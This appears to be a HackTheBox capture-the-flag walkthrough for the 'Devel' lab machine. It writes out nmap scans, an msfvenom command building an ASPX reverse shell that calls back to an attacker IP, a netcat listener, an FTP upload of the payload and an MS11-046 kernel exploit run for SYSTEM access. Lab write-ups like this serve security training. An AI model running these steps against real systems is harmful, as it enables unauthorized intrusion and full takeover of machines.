Following is the HackTheBox Devel machine’s walkthrough.
Vulnerability Exploited: Microsoft IIS7 Remote/Local File Inclusion Vulnerability
Privilege Escalation Vulnerability: MS11–046 AFD.sys Vulnerability
Steps:
Perform Nmap Port Scan on all ports:
Command: nmap -Pn -p- -sV --reason 10.10.10.5
Perform a detailed port scan of earlier detected ports 21 and 80:
Command: nmap -sS -sV -sC --open --reason -p 21,80 10.10.10.5
Upon visiting the Webpage, it shows us the default IIS page:
Based on the above Service enumeration result, FTP allows anonymous user login:
Let’s try to access local file iisstart.htm listed above using HTTP Service.
We can access the file. So, we can conclude FTP service lands us inside the HTTP Home directory.
Now, create a reverse shell payload file:
Command: msfvenom --payload windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 --platform windows --format aspx > payload.aspx
Start Netcat listener:
Command: nc -nvlp 4444
Upload payload on the target machine using FTP service:
Execute payload from browser:
Received reverse shell on port 4444 with limited access:
While performing post-exploitation checks (steps from https://www.fuzzysecurity.com/tutorials/16.html), I found Ancillary Function Driver (AFD) driver which supports Windows sockets applications and is vulnerable to an elevation of privileges.
Command: driverquery
Command: searchsploit afd windows local privilege escalation
MS11–046 is Kernel level exploit. Let's download Windows-Kernel Exploits repository from Github.
Command: git clone https://github.com/SecWiki/windows-kernel-exploits.git
Copy exploit from git folder to working directory:
Set execution-bit of the exploit and upload it on the target machine.
Go to C:\inetpub\wwwroot directory where the uploaded exploit is located and execute it.
We got SYSTEM privileges.
